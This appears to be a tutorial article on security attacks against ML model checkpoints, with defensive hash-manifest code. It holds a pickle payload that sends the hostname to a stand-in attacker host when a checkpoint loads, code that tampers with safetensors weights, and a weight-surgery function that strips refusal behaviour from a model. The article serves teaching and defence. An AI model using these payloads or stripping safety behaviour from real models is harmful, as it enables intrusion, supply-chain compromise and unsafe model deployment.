Model Checkpoint & Recovery Attacks

advanced8 min readUpdated 2026-03-13

Checkpoint file format vulnerabilities, modification attacks on safetensors and PyTorch formats, checkpoint poisoning, storage security, and supply chain implications.

checkpoint safetensors pytorch model-weights supply-chain pickle serialization

Model checkpoints are the primary distribution mechanism for pre-trained models. A checkpoint file contains the model's learned weights -- and potentially arbitrary code. The security of checkpoint formats, storage systems, and distribution channels directly determines whether the model a user loads is the model the developer intended.

Checkpoint Format Security

Format Comparison

Format	Serialization	Arbitrary Code Execution	Integrity Verification	Adoption
PyTorch (`.pt`, `.bin`)	Python pickle	Yes -- code runs on `torch.load()`	None built-in	Legacy, declining
Safetensors (`.safetensors`)	Custom binary, no code execution	No -- data-only format	Built-in hash validation	Growing, recommended
GGUF (`.gguf`)	Custom binary format	No -- structured metadata + tensors	Metadata validation	llama.cpp ecosystem
ONNX (`.onnx`)	Protocol Buffers	No -- declarative graph format	Protobuf validation	Inference-focused
TensorFlow SavedModel	Protocol Buffers + flat buffers	Limited -- custom ops can run code	Signature validation	TensorFlow ecosystem

Pickle Deserialization Attacks

Python's pickle module can serialize arbitrary Python objects, including objects whose __reduce__ method returns code to execute during deserialization.

import pickle
import torch
import os
 
class MaliciousPayload:
    """
    When unpickled, this object executes arbitrary code.
    torch.load() calls pickle.load() internally.
    """
    def __reduce__(self):
        # This code runs when the checkpoint is loaded
        return (os.system, ("curl https://attacker.com/exfil?h=$(hostname)",))
 
# Create a seemingly legitimate checkpoint with embedded payload
def create_poisoned_checkpoint(clean_model, output_path):
    """
    Save a real model checkpoint that also executes code on load.
    The model weights are valid -- the payload is a side effect.
    """
    state_dict = clean_model.state_dict()
    # Embed payload in an innocuous-looking key
    state_dict["_metadata_version"] = MaliciousPayload()
 
    torch.save(state_dict, output_path)
    # File loads normally: model works, but code executed silently

Safetensors: Security Properties and Limitations

The safetensors format was designed specifically to address pickle deserialization risks. It stores tensors as raw bytes with a JSON metadata header -- no code execution is possible during loading.

What Safetensors Protects Against

Attack	Protected?	How
Arbitrary code execution on load	Yes	No code in format, pure data
Weight modification in transit	Partially	File-level hash, but no per-tensor signing
Weight modification at rest	No	No encryption, anyone with file access can modify
Metadata poisoning	Partially	Metadata is JSON, validated but not signed
File substitution	No	Must verify file hash externally

What Safetensors Does NOT Protect Against

# Safetensors prevents code execution but NOT weight modification
from safetensors.torch import load_file, save_file
 
def modify_safetensors_weights(input_path, output_path, layer_name,
                                 modification_fn):
    """
    Load a safetensors file, modify specific weights, and save.
    This is trivial for anyone with file access.
    Safetensors provides no tamper detection after creation.
    """
    tensors = load_file(input_path)
 
    if layer_name in tensors:
        original = tensors[layer_name]
        tensors[layer_name] = modification_fn(original)
 
    save_file(tensors, output_path)
    # Output file is a valid safetensors file with modified weights
    # No indication of tampering unless external hash is checked

Checkpoint Modification Attacks

Weight Surgery

An attacker with access to stored checkpoints can perform targeted weight modifications without full retraining. This is faster and cheaper than data poisoning.

Identify target neurons
Use interpretability tools (probing, activation analysis) to identify neurons or attention heads responsible for specific behaviors -- particularly safety-relevant behaviors.
Compute adversarial weight delta
Calculate the minimal weight change needed to alter the target behavior. This can be done through gradient-based optimization on a small dataset.
Apply the modification
Load the checkpoint, modify the identified parameters, and save. The change is small enough that overall model quality metrics remain unchanged.
Replace the original checkpoint
Substitute the modified checkpoint in the storage system. If no integrity verification exists, the swap is undetectable.

# Targeted weight surgery to disable a safety behavior
def disable_refusal_behavior(model_path, output_path,
                              refusal_direction, scale=2.0):
    """
    Remove the model's refusal behavior by subtracting
    the refusal direction from relevant weight matrices.
 
    Based on research showing refusal is often encoded as a
    linear direction in activation space.
    """
    tensors = load_file(model_path)
 
    # Modify output projection weights in middle layers
    # where refusal behavior is typically encoded
    for layer_idx in range(12, 24):  # Middle layers
        key = f"model.layers.{layer_idx}.self_attn.o_proj.weight"
        if key in tensors:
            W = tensors[key].float()
            # Project out the refusal direction
            refusal_component = torch.outer(
                refusal_direction, refusal_direction
            ) @ W
            tensors[key] = (W - scale * refusal_component).half()
 
    save_file(tensors, output_path)

Supply Chain Risks in Model Distribution

Public Registry Vulnerabilities

Registry	Risk	Mitigation
Hugging Face Hub	Model impersonation, checkpoint substitution	Signed commits, organizational verification
Ollama Library	Modified GGUF files	SHA256 manifest verification
PyTorch Hub	Pickle-based checkpoints	`weights_only=True`, migrate to safetensors
Custom S3/GCS buckets	No access control by default	IAM policies, bucket versioning, access logging

Checkpoint Integrity Pipeline

import hashlib
from pathlib import Path
 
def create_checkpoint_manifest(checkpoint_dir: str) -> dict:
    """
    Create a signed manifest of all checkpoint files.
    Verify this manifest before loading any checkpoint.
    """
    manifest = {"files": {}, "created": "2026-03-13"}
 
    for path in Path(checkpoint_dir).glob("**/*"):
        if path.is_file():
            sha256 = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest["files"][str(path.relative_to(checkpoint_dir))] = {
                "sha256": sha256,
                "size": path.stat().st_size,
                "format": path.suffix,
            }
 
    return manifest
 
def verify_checkpoint_manifest(checkpoint_dir: str,
                                manifest: dict) -> list[str]:
    """
    Verify all files match their expected hashes.
    Returns list of files that fail verification.
    """
    failures = []
    for rel_path, expected in manifest["files"].items():
        full_path = Path(checkpoint_dir) / rel_path
        if not full_path.exists():
            failures.append(f"MISSING: {rel_path}")
            continue
 
        actual_hash = hashlib.sha256(full_path.read_bytes()).hexdigest()
        if actual_hash != expected["sha256"]:
            failures.append(f"MODIFIED: {rel_path}")
 
    return failures

Checkpoint Recovery Attacks

Training checkpoints saved for crash recovery introduce additional risks:

Attack	Description	Impact
Checkpoint rollback	Replace current checkpoint with an earlier one	Undo safety training progress
Checkpoint injection	Insert a checkpoint from a different training run	Completely different model weights
Recovery poisoning	Modify the checkpoint just before a recovery event	Model resumes training from a compromised state
Optimizer state manipulation	Modify saved optimizer state (momentum, Adam states)	Subtly influence future gradient updates

Pre-training Attack Surface -- Broader pre-training vulnerability context
Pickle Exploits -- Deep dive into pickle deserialization attacks
LoRA & Adapter Attacks -- Adapter-specific checkpoint risks
Model Supply Chain -- End-to-end supply chain security

Knowledge Check

A team downloads a model checkpoint from a public registry in safetensors format. Which of the following attacks is the safetensors format designed to prevent?

References

Safetensors: Simple, Safe Way to Store and Distribute Tensors (Hugging Face) -- Format specification
Pickle Serialization Security (Python docs) -- Official security warnings
Hugging Face Hub Security (Hugging Face) -- Registry security features

Model Checkpoint & Recovery Attacks

Identify target neurons

Compute adversarial weight delta

Apply the modification

Replace the original checkpoint

Related articles

Model Checkpoint & Recovery Attacks

Identify target neurons

Compute adversarial weight delta

Apply the modification

Replace the original checkpoint

Related articles